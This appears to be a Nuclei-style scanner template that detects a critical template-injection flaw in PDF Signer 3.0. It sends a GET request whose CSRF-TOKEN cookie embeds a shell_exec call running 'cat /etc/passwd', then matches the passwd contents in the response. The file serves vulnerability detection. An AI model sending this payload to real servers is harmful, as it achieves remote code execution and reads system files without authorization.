37 lines
1.1 KiB
YAML
37 lines
1.1 KiB
YAML
id: pdf-signer-ssti-to-rce
|
|
|
|
info:
|
|
name: PDF Signer 3.0 - Template Injection
|
|
author: madrobot
|
|
severity: critical
|
|
description: PDF Signer 3.0 is susceptible to a template injection which allows code execution, due to improper cookie handling and an improper CSRF implementation. An attacker can execute code on the server in the context of the web server.
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cwe-id: CWE-1336
|
|
metadata:
|
|
max-request: 1
|
|
tags: ssti,rce,csrf
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}"
|
|
|
|
headers:
|
|
Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
|
|
skip-variables-check: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
part: body
|
|
|
|
# digest: 490a004630440220346f42ec245dba5a5da138043cc2f9e8f3e5979db4c9db118d907d6c5dbbc44602203f58036f592e1767eb81a87cdf8169f704f3715b094ef1cadbf36dba96651657:922c64590222798bb761d5b6d8e72950
|